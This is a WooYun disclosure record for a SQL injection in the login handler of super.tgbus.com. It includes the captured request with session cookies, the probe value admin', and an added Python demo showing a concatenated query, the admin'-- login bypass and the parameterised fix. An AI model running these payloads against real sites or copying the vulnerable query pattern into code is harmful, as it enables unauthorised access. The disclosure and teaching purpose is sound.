WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
Disclosure timeline:
2015-09-18: Details sent to the vendor, awaiting vendor action
2015-09-21: Vendor confirmed; details visible to the vendor only
2015-10-01: Details opened to core white hats and relevant domain experts
2015-10-11: Details opened to regular white hats
2015-10-21: Details opened to intern white hats
2015-11-05: Details opened to the public
Brief description: plain SQL injection.
Details: the userName parameter of the login handler is injectable.
POST /User/Action.ashx?type=login HTTP/1.1
Host: super.tgbus.com
Content-Length: 60
Origin: http://super.tgbus.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
DNT: 1
Referer: http://super.tgbus.com/login.shtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Bsgu_3720_saltkey=9mr1488l; Bsgu_3720_lastvisit=1442499504; ASP.NET_SessionId=ljywmv45rokfwr2l45hzsjee; Bsgu_3720_auth=a1f0JlYYP%2BW9lRAaOMihghHlOiDyy4IBM9dXIwjt1jKdtZLhXw7y9jh5Nqc8KlfjNA1xGg97tSm%2F1f%2Fr1oOsTg6hyEPruw; Tgbus_Passport=A0587A65646117DE68ACE88632E90CA3567CF06AF5E0A819; Bsgu_3720_creditnotice=0D0D2D0D0D0D0D0D0D37873878; Bsgu_3720_creditbase=0D0D2D0D0D0D0D0D0; Bsgu_3720_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; Bsgu_3720_yfe_in=1; Bsgu_3720_cookiereport=60caQbeHd3OyUmkHj4eH6nJkGRc9BJjt0e8pEuPnr1AOJfFtSkDu; Bsgu_3720_ulastactivity=c11aePOoD5NhjXkS0G4kzr6qTRd1YL8mJ%2BxWokPiUHTmOMnDqRYd; Hm_lvt_765e4a95eb8653564a947c539998a20a=1442503938,1442503980,1442504372,1442504484; Hm_lpvt_765e4a95eb8653564a947c539998a20a=1442509479; Bsgu_3720_lastact=1442509484%09forum.php%09; Bsgu_3720_sid=3zm2hA

dialogMsg=&userName=admin'&password=asdasdasd&validateCode=4
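The mechanism behind the report, as an added example that is not part of the original WooYun page and not the site's own code: a constructed in-memory SQLite user table, a login lookup that concatenates the userName value into the query the way the vulnerable handler evidently does, and the same lookup with bound parameters. The page does not show the server-side code or name the database engine behind the ASP.NET handler, so the query shape, the table and column names and the seeded users are all assumptions. Feeding the report's probe value admin' to the concatenating version produces a SQL syntax error (the signal a tester relies on when a single quote changes the response), while admin'-- closes the string literal and comments out the password check; the parameterised version treats both values as ordinary usernames that simply do not match.

```python
import sqlite3

# Constructed sample accounts standing in for the site's real user table (assumption).
SEED_USERS = [("admin", "S3cret!"), ("alice", "hunter2")]


def make_db():
    """Fresh in-memory database with a minimal users table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", SEED_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation: user input reaches the SQL parser."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Same lookup with bound parameters: quotes and comment markers are just data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def probe(login, username, password="asdasdasd"):
    """Run one login attempt and classify the outcome.

    Returns ("ok", user) on a successful lookup, ("denied", None) when no row
    matches, and ("error", message) when the database rejects the statement.
    The default password is the throwaway value from the captured request.
    """
    conn = make_db()
    try:
        user = login(conn, username, password)
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("ok", user) if user else ("denied", None)


if __name__ == "__main__":
    for payload in ("admin", "admin'", "admin'--"):
        print(f"{payload!r:12} vulnerable={probe(login_vulnerable, payload)!r:40} "
              f"fixed={probe(login_fixed, payload)!r}")
```

Against the concatenating function the single quote turns into a malformed statement and the comment payload logs in as admin without the password; against the parameterised function both payloads are denied like any other wrong username, with no error. That contrast is also the cheapest black-box check a tester has: if appending one quote to a form field changes the response class (error page, stack trace, HTTP 500) instead of being rejected as a bad credential, the value is being parsed as SQL.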
程序猿
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-09-21 09:41
Vendor reply: Thanks to the reporter for the attention paid to Perfect World; we will patch this as soon as possible.
Latest status: None